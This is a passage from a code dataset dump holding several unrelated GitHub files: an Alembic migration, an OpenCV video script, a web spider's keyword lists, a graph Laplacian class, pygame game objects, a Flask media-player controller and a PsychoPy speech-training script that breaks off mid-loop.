sqlalchemy as sa\nfrom sqlalchemy.dialects import mysql\n\n# revision identifiers, used by Alembic.\nrevision = '3b8a6ed35c7c'\ndown_revision = '7fd63e303772'\nbranch_labels = None\ndepends_on = None\n\n\ndef upgrade():\n # ### commands auto generated by Alembic - please adjust! ###\n op.drop_column('patient', 'previous_help')\n # ### end Alembic commands ###\n\n\ndef downgrade():\n # ### commands auto generated by Alembic - please adjust! ###\n op.add_column('patient', sa.Column('previous_help', mysql.TINYINT(display_width=1), autoincrement=False, nullable=True))\n # ### end Alembic commands ###\n","repo_name":"kvaldesvallejo/phobiasBackEnd","sub_path":"migrations/versions/3b8a6ed35c7c_.py","file_name":"3b8a6ed35c7c_.py","file_ext":"py","file_size_in_byte":744,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"22297701839","text":"import os\nimport numpy as np\nimport cv2\nfrom tqdm import tqdm\n\n\npic_path = 'ctc_raw_data/train/Fluo-C2DL-MSC/02_RES'\nraw_path = 'ctc_raw_data/train/Fluo-C2DL-Huh7/01'\n\n\n# pic_list = sorted([p for p in os.listdir(pic_path) if p.split('.')[1] == 'tif'])\n# result = cv2.VideoWriter(f'{pic_path.split(\"/\")[-2]}-{pic_path.split(\"/\")[-1]}.mp4',\n# cv2.VideoWriter_fourcc('M', 'P', '4', 'V'), 10, (512, 512), False)\n# for img in tqdm(pic_list):\n# im = cv2.imread(os.path.join(pic_path, img), cv2.IMREAD_UNCHANGED)\n# im8 = im.astype(np.ubyte)\n# result.write(im8)\n#\n# result.release()\n\n\nraw_list = sorted([p for p in os.listdir(raw_path) if p.split('.')[1] == 'tif'])\nraw = cv2.VideoWriter(f'{raw_path.split(\"/\")[-2]}-{raw_path.split(\"/\")[-1]}.avi',\n -1, 10, (512, 512), False)\nfor img in tqdm(raw_list):\n im = cv2.imread(os.path.join(raw_path, img), cv2.IMREAD_UNCHANGED)\n im8 = im.astype(np.ubyte)\n raw.write(im8)\n\nraw.release()\n","repo_name":"nkjcqvcpi/Exp-DVP","sub_path":"Cell_Tracking/EmbedTrack/virtulize.py","file_name":"virtulize.py","file_ext":"py","file_size_in_byte":988,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"28447953819","text":"_negs = [\n\n # facebook\n\n '2008/fbml',\n 'like.php',\n 'sharer.php',\n 'likebox.php',\n '/plugins/',\n\n # twitter\n\n '/intent/',\n '?status=',\n 'twitter.com/share',\n 'widgets.js',\n '/widgets/',\n\n # g+\n\n '/share?',\n\n # pinterest\n\n 'pinit.js',\n 'pin/create',\n 'pinmarklet.js',\n\n]\n\n_negs_equals = [\n 'facebook.com',\n 'twitter.com',\n 'facebook.com/',\n 'twitter.com/',\n]\n\nsocial = [\n 'facebook.com',\n 'twitter.com',\n 'plus.google.com',\n 'pinterest.com',\n 'youtube.com',\n]\n\namazon = [\n 'amazon.com.au',\n 'amazon.com.br',\n 'amazon.ca',\n 'amazon.cn',\n 'amazon.fr',\n 'amazon.de',\n 'amazon.in',\n 'amazon.it',\n 'amazon.co.jp',\n 'amazon.com.mx',\n 'amazon.nl',\n 'amazon.es',\n 'amazon.co.uk',\n 'amazon.com/',\n]\n\nadvertising = [\n 'google_ad_client',\n 'doubleclick.net',\n]\n\nanalytics = [\n 'google-analytics.com/ga.js',\n 'googletag', #webmaster\n\n 'connect.facebook.net',\n 'fb:page_id',\n 'fb:app_id',\n 'fb:admins',\n\n 'alexa.com',\n\n 'optimizely.com',\n\n]\n\ncms = [\n\n # Blog\n \n 'wordpress',\n 'drupal',\n 'joomla',\n\n 'expressionengine',\n \n # Wiki\n\n 'mediawiki',\n 'phpwiki',\n 'tiki wiki',\n 'dokuwiki',\n \n # Forum\n\n 'vbulletin',\n 'phpbb',\n 'mybb',\n 'invision',\n 'xenforo',\n\n # Ecommerce\n\n 'magento',\n 'prestashop',\n 'oscommerce',\n \n 'woocommerce',\n 'woothemes',\n\n]\n\ndictionary = [ \n\n # Finance / Law\n\n 'debt',\n 'saving',\n 'mortgage',\n 'insurance',\n 'financ', \n 'pay',\n 'tax',\n 'money',\n 'bank',\n 'paid',\n 'capital',\n 'wealth',\n\n # Investing\n\n 'invest',\n\n 'forex',\n 'binary',\n 'stock',\n 'equity',\n\n 'gold',\n 'metal',\n 'silver',\n\n 'trade',\n 'trading',\n\n 'crypto',\n 'bitcoin',\n 'coin',\n\n # Borrowing\n\n 'loan', \n 'credit',\n 'card',\n\n # Law\n\n 'law',\n 'legal',\n 'attorney',\n 'dui',\n 'criminal',\n\n\n\n\n # Business\n\n 'biz',\n 'business',\n 'sales',\n 'market',\n 'manage',\n 'work',\n 'leader',\n 'job',\n\n # Providers\n\n 'solution',\n 'service',\n 'consult',\n 'pro',\n 'strateg',\n 'entertain',\n 'studio',\n 'firm',\n 'special',\n 'advisor',\n\n 'guru',\n 'amateur',\n 'coach',\n \n 'vip',\n\n\n # Entities / Entity\n\n 'llc',\n 'inc',\n 'corp',\n 'partner',\n 'associat',\n 'club',\n 'foundation',\n 'group',\n 'company',\n 'team',\n 'gang',\n 'alliance',\n\n # Occupations\n\n 'plumb',\n 'floor',\n 'construct',\n 'contract',\n 'security', #security provider\n 'build',\n 'repair',\n\n 'glass',\n 'lumber',\n 'wood',\n\n\n # Creative / Arts\n\n 'music',\n 'dj',\n 'song',\n\n 'artist',\n\n 'photo',\n 'guitar',\n 'poetry',\n 'dance',\n 'film',\n\n 'visual',\n\n 'production',\n\n\n\n\n\n # Fashion\n\n 'fashion',\n 'outfit',\n 'cloth',\n\n\n\n\n\n # Health\n\n 'health', \n 'life',\n 'beauty',\n 'beauti',\n\n 'juice',\n 'smoothie',\n 'yogurt',\n\n 'organic',\n\n 'nutri',\n\n 'skin',\n 'face',\n 'facial',\n 'hair',\n 'energy',\n 'power',\n\n # Medical\n\n 'chiro',\n 'ortho',\n 'pedic',\n\n 'medic',\n\n 'doctor',\n 'therapy', \n 'massage',\n 'clinic',\n 'pharma',\n 'drug',\n\n 'vision',\n\n 'dental',\n 'dentist',\n\n # Natural\n\n 'natural',\n\n # Fitness\n\n 'fit',\n 'training',\n 'yoga',\n 'gym',\n\n\n\n\n\n # Sports / Gaming\n\n 'sport',\n\n 'golf',\n 'horse',\n \n 'bike',\n 'biking',\n 'cycle',\n \n 'race',\n 'racing',\n 'tennis',\n 'fish',\n 'kayak',\n 'diving',\n 'surf',\n 'ball',\n 'hiking',\n 'board',\n\n 'sail',\n 'marine',\n\n 'game',\n 'gaming',\n\n 'play',\n\n\n\n\n # Auto / Home / Boat\n\n 'car',\n 'auto', \n 'motor',\n\n 'estate', \n 'realty',\n 'realtor',\n\n 'home',\n 'land',\n 'property',\n 'propertie',\n 'prop',\n 'house',\n 'acre',\n 'villa',\n\n 'apt',\n 'apartment',\n \n 'rent',\n 'condo',\n 'shore',\n 'lake',\n 'forest',\n 'trail',\n\n 'north',\n 'south',\n 'east',\n 'west',\n\n 'boat',\n\n\n\n\n\n # Wedding\n\n 'wedding',\n 'marriage',\n 'marry',\n 'husband',\n 'wife',\n 'relationship',\n\n\n\n\n\n # Students\n\n 'student',\n 'college',\n 'school',\n 'university',\n 'education',\n 'tutor',\n 'learn',\n 'academ',\n 'instit',\n 'study',\n 'studies',\n\n\n\n\n # Lifestyle\n\n 'good',\n 'living',\n 'diy',\n 'freedom',\n 'well',\n\n 'country',\n 'southern',\n\n # Travel\n\n 'travel',\n 'tour',\n 'holiday',\n 'voyage',\n 'trip',\n 'island',\n 'vacation',\n \n 'flight',\n 'fly',\n\n 'backpack',\n \n # Family / Demographics\n\n 'family',\n\n 'mom',\n 'mum',\n 'mama',\n 'dad',\n 'parent',\n\n 'kid',\n 'child',\n 'baby',\n 'toddler',\n\n 'senior',\n 'elder',\n 'youth',\n 'young',\n\n 'girl',\n 'boy',\n 'guy',\n 'dude',\n\n 'sister',\n 'brother',\n\n # Outdoor\n \n 'outdoor',\n 'outside',\n 'camp',\n 'nature',\n\n # Food / Beverage\n\n 'food',\n 'cook',\n 'drink',\n\n 'coffee',\n 'pizza',\n 'beer',\n 'bbq', \n 'wine',\n 'grill',\n 'cake',\n 'burger',\n\n 'cafe',\n 'restaurant',\n\n 'eat',\n 'eating',\n 'eats',\n\n 'recipe',\n\n # Periodicals\n\n 'magazine',\n 'mag',\n 'podcast',\n 'news',\n 'journal',\n 'radio',\n 'times',\n 'press',\n 'post',\n 'wire',\n 'chronic',\n\n # Gender\n\n 'men',\n 'man',\n\n # Ministry\n\n 'ministry',\n 'faith',\n 'god',\n 'church',\n 'scripture',\n 'christian',\n 'pray',\n 'temple',\n 'chapel',\n 'bible',\n\n # Activities\n\n 'garden',\n 'festiv',\n \n 'cinema',\n 'theater',\n 'theatre',\n\n 'salon',\n 'spa',\n\n # Weed\n\n '420',\n 'weed',\n 'marijuana',\n 'canna',\n 'cannabis',\n\n\n\n\n\n\n\n\n # Shopping\n\n 'mall',\n 'shop',\n 'retail',\n 'depot',\n 'store',\n 'mart',\n 'suppl',\n\n # Books\n\n 'book',\n 'fiction',\n 'publish',\n 'author',\n\n # Jewlry\n\n 'jewel',\n 'jewlry',\n 'jeweler',\n 'diamond',\n 'ring',\n 'necklace',\n\n # Products\n\n 'shoe',\n 'vape',\n\n 'kitchen',\n\n 'flower',\n\n\n\n\n # Web / Tech\n\n 'web',\n 'internet',\n 'app',\n 'tech',\n 'online',\n 'computer',\n 'pc',\n 'phone',\n 'software',\n\n # Providers\n\n 'host',\n 'seo',\n 'design',\n 'develop',\n\n # Platforms\n\n 'wiki',\n 'pedia',\n\n 'cms',\n 'blog',\n 'download',\n 'tube',\n 'image',\n 'video',\n 'forum',\n 'article',\n 'guide',\n 'movie',\n 'tv',\n 'comic',\n 'feed',\n 'chat',\n 'chan',\n 'report',\n 'gallery',\n 'anime',\n 'history',\n 'planet',\n 'buzz',\n\n 'wallpaper',\n 'background',\n\n 'hd',\n\n # Technologies\n\n 'linux', \n 'cloud',\n \n 'wordpress',\n 'wp',\n 'theme',\n\n 'magento', \n\n 'android',\n 'mobile',\n 'mobi',\n \n 'digi',\n\n 'google',\n 'youtube',\n 'facebook',\n\n\n\n\n\n # Accomodations\n\n 'inn',\n 'hotel',\n 'motel',\n 'booking',\n 'lodge',\n 'resort',\n 'suite',\n\n\n\n\n # Animals / Pets\n 'dog',\n 'pet',\n 'animal',\n\n\n\n\n\n\n\n\n\n\n\n\n\n # Places\n\n 'america',\n 'usa',\n\n 'canada',\n 'toronto',\n 'ontario',\n \n 'local',\n 'town',\n 'ville',\n 'village',\n\n 'japan',\n '-jp',\n\n 'ocean',\n 'coast',\n 'atlantic',\n 'pacific',\n 'beach',\n 'mountain',\n\n 'earth',\n\n # New York\n\n 'newyork',\n 'nyc',\n\n # Texas\n\n 'texas',\n\n 'austin',\n 'dallas',\n 'houston',\n\n # Philadelphia\n\n 'philly',\n 'philadelphia',\n\n # States\n\n 'michigan',\n 'indiana',\n 'california',\n 'florida',\n 'kansas',\n 'hawaii',\n\n # Cities\n\n 'atlanta',\n 'milwaukee',\n 'london',\n 'losangeles',\n 'chicago',\n 'seattle',\n 'denver',\n 'boston',\n 'memphis',\n\n 'detroit',\n\n\n\n\n\n\n\n\n\n\n\n\n # Commercial Intent\n\n 'coupon',\n 'deal',\n 'review',\n 'save',\n 'free',\n \n 'buy',\n 'sell',\n 'new',\n 'ship', #ing; (?)\n 'discount',\n 'custom',\n 'best',\n 'top',\n 'cheap',\n 'sale',\n 'bad',\n 'built',\n 'smart', # (?)\n 'perfect',\n 'dirty',\n 'clean',\n 'fast',\n\n 'relief',\n\n # Informational; traffic funnel.\n\n 'howto',\n 'problem',\n 'tips',\n 'answer',\n 'solution',\n 'help',\n 'about',\n 'list',\n 'ask',\n 'advice',\n 'support',\n 'faq',\n '101',\n\n # colors\n\n 'red',\n 'blue',\n 'orange',\n 'green',\n 'yellow',\n 'purple',\n 'black',\n 'white',\n\n # days of the week\n\n 'sunday',\n 'monday',\n 'tuesday',\n 'wednesday',\n 'thursday',\n 'friday',\n 'saturday',\n\n # time\n\n 'today', \n 'minute',\n 'future',\n 'now',\n\n 'daily',\n 'week',\n 'month',\n 'year',\n\n 'day',\n 'night',\n\n 'christmas',\n 'halloween',\n 'blackfriday',\n 'valentine',\n 'thanksgiving',\n\n # 5 w\n \n 'who',\n 'what',\n 'when',\n 'where',\n 'why',\n\n\n\n\n\n\n\n\n # adjectives\n\n 'vintage',\n 'classic',\n 'oriental',\n 'bold',\n 'big',\n 'small',\n 'luxury',\n 'rich',\n 'poor',\n 'advance',\n 'premium',\n 'premier',\n 'awesome',\n 'cool',\n '247',\n\n # uncat\n\n 'science',\n 'hydro',\n 'ology',\n 'chem',\n\n 'global',\n 'national',\n 'world',\n \n 'social',\n 'media',\n 'plus',\n \n 'industr',\n 'enterprise',\n \n 'system',\n 'hub',\n 'talk',\n 'center',\n 'centre',\n\n 'creat',\n 'connect',\n\n 'essential',\n\n 'hello',\n\n 'love',\n\n\n]\n\n\"\"\"\ntrue_dict = []\nwith open('/home/johnny/dev/toolbox/dictionaries/words.txt', 'r') as f:\n for line in f:\n l = line.strip()\n if len(l) > 3:\n true_dict.append(l.lower())\n\"\"\"","repo_name":"hoytnix/spidey","sub_path":"search_engine/search/keys.py","file_name":"keys.py","file_ext":"py","file_size_in_byte":9878,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"38643457212","text":"from numpy import matlib as mat\nimport time\n\n# For testing - saves time to type in\nTEST_DATA = 'graph_data/test_2.edges'\n\nclass ReadEdges():\n \"\"\"\n Class for reading an edge file and processing into matricies\n\n args:\n filename (str): filename containing the edges\n \n attrs:\n edgeset_1 (arr(int)): set of verticies that connect to edgeset_2\n edgeset_2 (arr(int)): set of verticies that connect to edgeset_1\n adjacency (numpy.matrix): adjacency matrix of the graph\n degree (numpy.matrix): degree matrix of the graph\n laplacian (numpy.matrix): laplacian matrix of the graph\n \"\"\"\n def __init__(self, filename):\n \"\"\"\n Process the edges into two arrays of corresponding verticies\n ex.) [1,2,3] [4,1,4]\n 1-4\n 2-1\n 4-3 \n \"\"\"\n self.edgeset_1 = []\n self.edgeset_2 = []\n self.node_ids = []\n with open(filename, 'r') as edge_fl:\n for line in edge_fl:\n try:\n # some edge files have the first line list stats - can ignore\n x, y = line.split(' ')\n self.edgeset_1.append(x.strip('\\n'))\n self.edgeset_2.append(y.strip('\\n'))\n except ValueError:\n pass\n \n def print_edges(self):\n \"\"\"\n Prints the edges contained in edgeset_1 and edgeset_2\n \"\"\"\n for index in range(0, len(self.edgeset_1)):\n print(self.edgeset_1[index] + ' ' + self.edgeset_2[index])\n\n def __get_adjacency(self):\n \"\"\"\n Creates an adjacency matrix from edgesets\n * NOTE no. of unique edges in edgeset_1 might not be \n the same as no. of unique edges in edgeset_2\n * NOTE the total number of unique verticies has to be\n obtained through the union of the two unique edgelists\n \"\"\"\n self.node_ids = range(1, len(set.union(set(self.edgeset_1), set(self.edgeset_2)))+1)\n self.mat_dim = len(self.node_ids)\n self.adj_mat = mat.zeros((self.mat_dim, self.mat_dim))\n for edge_index in range(len(self.edgeset_1)):\n index_1 = int(self.edgeset_1[edge_index])-1\n index_2 = int(self.edgeset_2[edge_index])-1\n self.adj_mat[index_1, index_2] = 1\n self.adj_mat[index_2, index_1] = 1\n return self.adj_mat\n\n def __get_degree(self):\n \"\"\"\n Creates a Degree matrix from the adjacency matrix\n If the adjacency matrix has not yet been created,\n this method will create one\n *NOTE the __get_adjacency method should be called prior\n \"\"\"\n self.deg_mat = mat.zeros((self.mat_dim, self.mat_dim))\n for i in range(self.mat_dim):\n self.deg_mat[i, i] = self.adj_mat[:, i].sum()\n return self.deg_mat\n\n def __get_laplacian(self):\n \"\"\"\n Creates a laplacian matrix from the adjacency and Degree matrix\n *NOTE the __get_degree method should be called priors\n \"\"\"\n self.lap_mat = mat.zeros((self.mat_dim, self.mat_dim))\n for row in range(self.mat_dim):\n for col in range(row, self.mat_dim):\n self.lap_mat[row, col] = self.deg_mat[row, col] - self.adj_mat[row, col]\n self.lap_mat[col, row] = self.deg_mat[row, col] - self.adj_mat[row, col]\n return self.lap_mat\n\n def generate_matricies(self):\n \"\"\"\n Generates the adjacency, degree, and laplacian matrix in one method for timing\n \"\"\"\n self.__get_adjacency()\n self.__get_degree()\n self.__get_laplacian()\n\ndef main():\n # Test usage\n x = ReadEdges(TEST_DATA)\n start = time.time()\n x.generate_matricies()\n end = time.time()\n print(end-start)\n print(x.lap_mat)\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"millotpg/Graph_Clustering","sub_path":"sequential/read_edges.py","file_name":"read_edges.py","file_ext":"py","file_size_in_byte":3847,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"2592249476","text":"from game import *\n\nclass Player():\n def __init__(self, x, y):\n self.velocityX = 0\n self.velocityY = 0\n self.inventory = []\n self.image = pygame.image.load(os.path.join(sourceFileDir, \"character.png\"))\n self.speed = 10\n self.x = x #center x and y\n self.y = y\n self.width = self.image.get_width()\n self.height = self.image.get_height()\n self.angle = 0\n self.health = 100\n \n def updatePhysics(self):\n if self.velocityY > 0:\n self.velocityY -= friction\n self.velocityY = max(0, self.velocityY)\n elif self.velocityY < 0:\n self.velocityY += friction\n self.velocityY = min(0, self.velocityY)\n if self.velocityX > 0:\n self.velocityX -= friction\n self.velocityX = max(0, self.velocityX)\n elif self.velocityX < 0:\n self.velocityX += friction\n self.velocityX = min(0, self.velocityX)\n\n if self.velocityY > -self.speed and (keys[pygame.K_UP] or keys[pygame.K_w]):\n self.velocityY -= acceleration\n if self.velocityY < self.speed and (keys[pygame.K_DOWN] or keys[pygame.K_s]):\n self.velocityY += acceleration\n if self.velocityX < self.speed and (keys[pygame.K_RIGHT] or keys[pygame.K_d]):\n self.velocityX += acceleration\n if self.velocityX > -self.speed and (keys[pygame.K_LEFT] or keys[pygame.K_a]):\n self.velocityX -= acceleration\n\n print(self.x, self.y)\n\n '''for tile in tiles:\n if self.rect.colliderect(tile.rect):\n self.velocityX = 0\n self.velocityY = -20''' # boost pad, if set both to 0, becomes sand\n\n self.x += self.velocityX #move x, then check for collisions horizontally, then move y and check for collisions vertically\n\n for tile in tiles:\n if rectCollisionCheck(self, tile):\n if self.velocityX > 0:\n self.x = tile.x - self.width/2 - tile.width/2\n if self.velocityX < 0:\n self.x = tile.x + self.width/2 + tile.width/2\n\n self.y += self.velocityY\n\n for tile in tiles:\n if rectCollisionCheck(self, tile):\n if self.velocityY > 0:\n self.y = tile.y - self.height/2 - tile.height/2\n if self.velocityY < 0:\n self.y = tile.y + self.height/2 + tile.height/2\n\n def update(self):\n self.updatePhysics()\n\n newImage = pygame.transform.rotate(self.image, self.angle)\n newRect = newImage.get_rect(center = (centerX, centerY))\n gameDisplay.blit(newImage, newRect)\n \n def meleeAttack(self, angle, attackRange, damage):\n for enemy in enemies:\n if (enemy.x - player.x) ** 2 + (enemy.y - player.y) ** 2 < attackRange ** 2:\n enemy.health -= damage\n knockbackX = math.cos(math.radians(angle))\n knockbackY = -math.sin(math.radians(angle))\n enemy.velocityX = 7 * knockbackX\n enemy.velocityY = 7 * knockbackY\n\nclass Projectile():\n def __init__(self, x, y, directionX, directionY, speed):\n\n magnitude = math.sqrt(directionX ** 2 + directionY ** 2)\n directionX = directionX / magnitude\n directionY = directionY / magnitude\n\n self.angle = -math.atan2(directionY, directionX)\n self.image = pygame.transform.rotate(pygame.image.load(os.path.join(sourceFileDir,\"projectile.png\")), math.degrees(self.angle))\n self.speed = speed\n self.velocityX = self.speed * directionX\n self.velocityY = self.speed * directionY\n self.x = x #center x and y\n self.y = y\n self.width = self.image.get_width()\n self.height = self.image.get_height()\n projectiles.append(self)\n\n def update(self):\n self.x += self.velocityX\n self.y += self.velocityY\n for tile in tiles:\n if pointCollisionCheck(self, tile):\n projectiles.remove(self)\n #gameDisplay.blit(self.image, (centerX - player.rect.width/2 + (self.rect.centerx - player.rect.x), centerY - player.rect.height/2 + (self.rect.centery - player.rect.y)))\n #pygame.draw.circle(gameDisplay, (90, 0, 0), (int(centerX - player.rect.width/2 + (self.rect.centerx - player.rect.x)), int(centerY - player.rect.height/2 + (self.rect.centery - player.rect.y))), 5)\n gameDisplay.blit(self.image, (centerX + (self.x - player.x) - self.width/2, centerY + (self.y - player.y) - self.height/2))\n\n\nclass Tile():\n def __init__(self, x, y):\n self.image = pygame.image.load(os.path.join(sourceFileDir,\"tile.png\"))\n self.x = x\n self.y = y\n self.width = tileSize\n self.height = tileSize\n tiles.append(self)\n def update(self):\n gameDisplay.blit(self.image, (centerX + (self.x - player.x) - self.width/2, centerY + (self.y - player.y) - self.height/2))\n\n '''displayX = centerX + (self. rect.x - player.rect.x)\n displayY = centerY + (self.rect.y - player.rect.x)\n if displayWidth > displayX > 0 and displayHeight > displayY > 0:\n gameDisplay.blit(self.image, (displayX, displayY))'''\n\nclass Enemy():\n def __init__(self, x, y):\n self.image = pygame.image.load(os.path.join(sourceFileDir,\"enemy.png\"))\n self.x = x\n self.y = y\n self.width = self.image.get_width()\n self.height = self.image.get_height()\n self.velocityX = 0\n self.velocityY = 0\n self.speed = 3\n self.angle = 0\n self.moveMode = \"idle\"\n self.idleTimer = 0\n self.health = 50\n self.directionX = 0\n self.directionY = 0\n enemies.append(self)\n\n def updatePhysics(self):\n if self.velocityY > 0:\n self.velocityY -= friction\n self.velocityY = max(0, self.velocityY)\n elif self.velocityY < 0:\n self.velocityY += friction\n self.velocityY = min(0, self.velocityY)\n if self.velocityX > 0:\n self.velocityX -= friction\n self.velocityX = max(0, self.velocityX)\n elif self.velocityX < 0:\n self.velocityX += friction\n self.velocityX = min(0, self.velocityX)\n\n if -self.speed < self.velocityX < self.speed and -self.speed < self.velocityY < self.speed:\n self.velocityX += self.directionX * acceleration\n self.velocityY += self.directionY * acceleration\n\n self.x += self.velocityX #move x, then check for collisions horizontally, then move y and check for collisions vertically\n\n for tile in tiles:\n if rectCollisionCheck(self, tile):\n if self.velocityX > 0:\n self.x = tile.x - self.width/2 - tile.width/2\n if self.velocityX < 0:\n self.x = tile.x + self.width/2 + tile.width/2\n\n self.y += self.velocityY\n\n for tile in tiles:\n if rectCollisionCheck(self, tile):\n if self.velocityY > 0:\n self.y = tile.y - self.height/2 - tile.height/2\n if self.velocityY < 0:\n self.y = tile.y + self.height/2 + tile.height/2\n\n def update(self):\n self.updatePhysics()\n\n if pygame.time.get_ticks() >= self.idleTimer:\n self.idleTimer += 3000\n if self.directionX == 0 and self.directionY == 0:\n self.directionX = random.randint(-1, 1)\n self.directionY = random.randint(-1, 1)\n else:\n self.directionX = 0\n self.directionY = 0\n\n self.angle = -math.degrees(math.atan2(self.velocityY, self.velocityX))\n newImage = pygame.transform.rotate(self.image, self.angle)\n gameDisplay.blit(newImage, (centerX + (self.x - player.x) - self.width/2, centerY + (self.y - player.y) - self.height/2))\n","repo_name":"P4GAN/tileRPG","sub_path":"gameObjects.py","file_name":"gameObjects.py","file_ext":"py","file_size_in_byte":7922,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"43446613654","text":"# -*- coding: utf-8 -*-\nfrom flask import Flask, jsonify\nimport os, logging, json\nfrom logging.handlers import RotatingFileHandler\n\napp = Flask(__name__)\n\n# Chargement des clés d'accès aux médias\nwith open('media/player.json') as outfile:\n medias = json.load(outfile)\n\n@app.route('/')\ndef accueil():\n message = \"Player a votre ecoute...\"\n info(message)\n return jsonify(message)\n\n@app.route('/play/')\ndef play(keyFile):\n message = \"Play...\"\n if os.system(\"pgrep --list-name audacious\") == 0:\n if keyFile == \"0\":\n command = f\"audacious --stop\"\n iret = os.system(command)\n message = f\"play {iret} {command}\"\n elif keyFile == \"1\":\n command = f\"audacious --pause\"\n iret = os.system(command)\n message = f\"play {iret} {command}\"\n elif keyFile == \"2\":\n command = f\"audacious --play\"\n iret = os.system(command)\n message = f\"play {iret} {command}\"\n elif medias[\"drums\"][keyFile] is not None:\n filePath = os.path.join(app.root_path, 'media', medias[\"drums\"][keyFile])\n if os.path.exists(filePath):\n command = f\"audacious {filePath}\"\n iret = os.system(command)\n message = f\"play {iret} {command}\"\n if iret == 0:\n info(message)\n else:\n error(message)\n else:\n message = f\"{filePath} non trouvé\"\n error(message)\n else:\n message(f\"clé [{keyFile}] non trouvée\")\n else:\n message = f\"Audacious non démarré\"\n error(message)\n \n\n return jsonify(message)\n\n@app.route('/stop')\ndef stop():\n message = \"Stop..\"\n if os.system(\"pgrep --list-name audacious\") == 0:\n command = f\"audacious --stop\"\n iret = os.system(command)\n message = f\"stop {iret}\"\n if iret == 0:\n info(message)\n else:\n error(message)\n else:\n message = f\"Audacious non démarré\"\n error(message)\n\n return jsonify(message)\n\ndef info(message):\n app.logger.info(message)\ndef error(message):\n app.logger.error(message)\n\n# Tests unitaires\nif __name__ == '__main__':\n info(\"Player en marche...\")\n app.run(host='0.0.0.0', port=8053, debug=True)\n","repo_name":"pbillerot/player-flask","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":2098,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"16165572524","text":"# training.py\r\n# This is the training script which will be presented to the participant before they sleep\r\n# or remain awake\r\n#\r\n# TODO\r\n\r\n# Libraries - these seem fine and should not need altering.\r\nfrom psychopy import visual, event, core, misc, data, gui, sound\r\n\r\n# Participant needs to press y to continue.\r\ndef ready_cont():\r\n stim_win.flip()\r\n user_response=None\r\n while user_response==None:\r\n allKeys=event.waitKeys()\r\n for thisKey in allKeys:\r\n if thisKey=='y':\r\n user_response=1\r\n if thisKey=='q':\r\n core.quit()\r\n\r\n# Metronome function - This plays the metronome; the timing can also be altered here.\r\n# The timing required needs to be passed to metronome function.\r\n#music = pyglet.resource.media('klack.ogg', streaming=False)\r\nmusic = sound.Sound(900,secs=0.01) # Just temporary\r\ndef metronome(met_time):\r\n music.play()\r\n core.wait(met_time)\r\n music.play()\r\n core.wait(met_time)\r\n music.play()\r\n core.wait(met_time)\r\n music.play()\r\n core.wait(met_time)\r\n\r\n# The metronome alone so the participant can become familiar with\r\n# the speed (no stimuli).\r\ndef metronome_alone():\r\n stim_win.flip()\r\n metronome(cvc_slow_rate)\r\n metronome(cvc_faster_rate)\r\n metronome(cvc_faster_rate)\r\n metronome(cvc_faster_rate)\r\n\r\n# Variables\r\nwelcome_message = \"\"\"Welcome to the training session! You will see four syllables in a row. Please read the entire row out loud 4 times in time to the metronome and try to say one syllable per beat. The first time will be slow, and the next 3 repetitions will be a little faster. Try to read as fluently as possible. Do not worry if you make mistakes, just keep in time with the beat.\r\nPress y now to hear the speed of the metronome.\"\"\"\r\nsample_welcome = \"\"\"The following will be a practice session to familiarize you with the sequences (press y to continue)\"\"\"\r\nsample_goodbye = \"\"\"The sample has ended, please press y if you are ready for the real session\"\"\"\r\nthank_you = \"\"\"The training session is complete,\r\nPlease inform a researcher you have finished.\r\nThank you.\"\"\"\r\nmetronome_alone_message = \"\"\"Playing the metronome...\"\"\"\r\n\r\n# cvc rates\r\ncvc_slow_rate = 1.0\r\n# A cvc every 395ms with Warker e al (2008)\r\ncvc_faster_rate = 0.395\r\n# interval between each sequence\r\nstim_interval = 1.0\r\nbetween_tests_interval = 2.0\r\n\r\n# Stimuli variables - These are the non counterbalanced stimuli.\r\nsample_stim = ['haf gak mang san',\r\n'kis mig hing fin',\r\n'sak haf nam gang']\r\n\r\nreal_stim = ['naf hang sag kam',\r\n'kin fis ming hig',\r\n'gaf ham sang kan',\r\n'ning fis hig kim',\r\n'nang hag maf sak',\r\n'hig kim fis ning',\r\n'kaf han mang sag',\r\n'hin mig kis fing',\r\n'gak saf ham nang',\r\n'nim fis ging hik',\r\n'sam kan haf gang',\r\n'hig nis kim fing',\r\n'naf mag hak sang',\r\n'hik nis fim ging',\r\n'hang saf nam kag',\r\n'hin fis ming kig',\r\n'hang gaf sam nak',\r\n'mig king hin fis',\r\n'haf sang mak nag',\r\n'kin mis hing fig',\r\n'man sag kaf hang',\r\n'ging fis hik nim',\r\n'sam gaf kan hang',\r\n'ming fig kis hin',\r\n'gak san haf mang',\r\n'his fin kim ging',\r\n'mak haf nang sag',\r\n'fin kim gis hing',\r\n'kang saf han gam',\r\n'gim fin king his',\r\n'mag sang kaf han',\r\n'mik nis hing fig',\r\n'saf han kang gam',\r\n'ging hin fis kim',\r\n'man kag haf sang',\r\n'mig hik ning fis',\r\n'nag hak mang saf',\r\n'kin hing fim gis',\r\n'san kaf mag hang',\r\n'him king gis fin',\r\n'kang ham naf sag',\r\n'hing nim fis kig',\r\n'saf nak gam hang',\r\n'hik mig fing nis',\r\n'nag hak maf sang',\r\n'fis hik nim ging',\r\n'sag kam haf nang',\r\n'fing him nis gik']\r\n\r\n# Setting up the screen.\r\nstim_win = visual.Window(monitor = \"testMonitor\", units ='norm', fullscr=True)\r\nmessage = visual.TextStim(stim_win, text = welcome_message, font = \"Arial\")\r\nmessage.setAutoDraw(True)\r\nready_cont()\r\nstim_win.flip()\r\n\r\n# The metronome so participant's know what it's like.\r\n# Hmm allow participant to repeat? - Not really fair if\r\n# some participants' run it more than others and pronounce\r\n# cvc's better due to familiarity with the beat.\r\nmessage.setText(metronome_alone_message)\r\nmetronome_alone()\r\ncore.wait(stim_interval)\r\nstim_win.flip()\r\n\r\n# Welcome the participant.\r\nmessage.setText(sample_welcome)\r\nready_cont()\r\n\r\n# The sample loop\r\nstim_win.flip()\r\nfor i in range(len(sample_stim)):\r\n message.setText(sample_stim[i])\r\n 